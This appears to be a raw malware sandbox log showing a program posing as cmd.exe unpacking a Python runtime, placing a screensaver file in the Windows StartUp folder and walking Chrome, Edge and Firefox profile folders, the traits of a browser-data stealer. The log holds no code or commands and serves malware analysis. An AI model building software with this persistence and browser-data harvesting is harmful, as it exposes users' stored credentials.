              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\Desktop\cmd.exe VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642 VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642 VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642 VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\Desktop\cmd.exe VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642 VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642 VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642\_ctypes.pyd VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642 VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\Desktop\cmd.exe VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642\blank.aes VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642\libffi-7.dll VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642\python310.dll VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642\select.pyd VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642\_lzma.pyd VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642\_ssl.pyd VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\Desktop\cmd.exe VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\Desktop\cmd.exe VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\Desktop\cmd.exe VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\Desktop\cmd.exe VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\Desktop\cmd.exe VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\Desktop\cmd.exe VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\Desktop\cmd.exe VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\Desktop\cmd.exe VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\Desktop\cmd.exe VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\Desktop\cmd.exe VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\Desktop\cmd.exe VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642 VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\Desktop\cmd.exe VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\Desktop\cmd.exe VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642 VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\Desktop\cmd.exe VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642\blank.aes VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642\blank.aes VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642\blank.aes VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642\blank.aes VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642\blank.aes VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642\blank.aes VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\Desktop\cmd.exe VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642 VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642\_lzma.pyd VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\Desktop\cmd.exe VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\Desktop\cmd.exe VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\Desktop\cmd.exe VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\Desktop\cmd.exe VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642 VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642 VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\Desktop\cmd.exe VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\Desktop\cmd.exe VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\Desktop\cmd.exe VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\Desktop\cmd.exe VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642 VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642\_bz2.pyd VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\Desktop\cmd.exe VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642 VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\Desktop\cmd.exe VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\Desktop\cmd.exe VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642 VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642\_sqlite3.pyd VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\Desktop\cmd.exe VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\Desktop\cmd.exe VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\Desktop\cmd.exe VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\Desktop\cmd.exe VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\Desktop\cmd.exe VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\Desktop\cmd.exe VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642 VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\Desktop\cmd.exe VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\Desktop\cmd.exe VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642 VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642\_socket.pyd VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\Desktop\cmd.exe VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642 VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642\select.pyd VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\Desktop\cmd.exe VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642 VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\Desktop\cmd.exe VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\Desktop\cmd.exe VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642 VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\Desktop\cmd.exe VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\Desktop\cmd.exe VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\Desktop\cmd.exe VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\Desktop\cmd.exe VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\Desktop\cmd.exe VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\Desktop\cmd.exe VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\Desktop\cmd.exe VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\Desktop\cmd.exe VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\Desktop\cmd.exe VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\Desktop\cmd.exe VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\Desktop\cmd.exe VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\Desktop\cmd.exe VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642 VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\Desktop\cmd.exe VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\Desktop\cmd.exe VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\Desktop\cmd.exe VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\Desktop\cmd.exe VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\Desktop\cmd.exe VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\Desktop\cmd.exe VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\Desktop\cmd.exe VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642 VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642\_ssl.pyd VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\Desktop\cmd.exe VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\Desktop\cmd.exe VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642 VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\Desktop\cmd.exe VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\Desktop\cmd.exe VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\Desktop\cmd.exe VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\Desktop\cmd.exe VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642 VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642 VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642 VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\Desktop\cmd.exe VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\Desktop\cmd.exe VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\Desktop\cmd.exe VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\Desktop\cmd.exe VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642 VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642\_hashlib.pyd VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\Desktop\cmd.exe VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\Desktop\cmd.exe VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\Desktop\cmd.exe VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\Desktop\cmd.exe VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\Desktop\cmd.exe VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\Desktop\cmd.exe VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\Desktop\cmd.exe VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642 VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642\_queue.pyd VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\Desktop\cmd.exe VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\Desktop\cmd.exe VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\Desktop\cmd.exe VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\Desktop\cmd.exe VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642 VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642 VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\Desktop\cmd.exe VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\Desktop\cmd.exe VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\Desktop\cmd.exe VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\Desktop\cmd.exe VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\Desktop\cmd.exe VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\Desktop\cmd.exe VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642 VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\Desktop\cmd.exe VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\Desktop\cmd.exe VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\Desktop\cmd.exe VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642 VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\Desktop\cmd.exe VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\Desktop\cmd.exe VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\Desktop\cmd.exe VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\Desktop\cmd.exe VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\Desktop\cmd.exe VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\Desktop\cmd.exe VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\Desktop\cmd.exe VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\Desktop\cmd.exe VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ?.scr VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\Desktop\cmd.exe VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\Desktop\cmd.exe VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642 VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642\unicodedata.pyd VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\CertificateRevocation VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\attachments VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\reports VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crowd Deny VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\fccd7e85-a1ff-4466-9ff5-c20d62f6e0a2 VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir VolumeInformation
